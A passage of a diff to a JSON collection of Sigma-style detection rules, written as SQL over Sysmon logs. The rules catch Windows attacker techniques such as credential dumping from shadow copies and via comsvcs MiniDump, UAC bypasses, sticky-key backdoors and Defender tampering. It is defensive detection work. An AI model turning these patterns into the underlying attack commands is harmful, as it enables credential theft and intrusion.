"attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Some rare backup scenarios" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.collection", - "attack.t1114" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", - "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "status": "test", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.009" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND 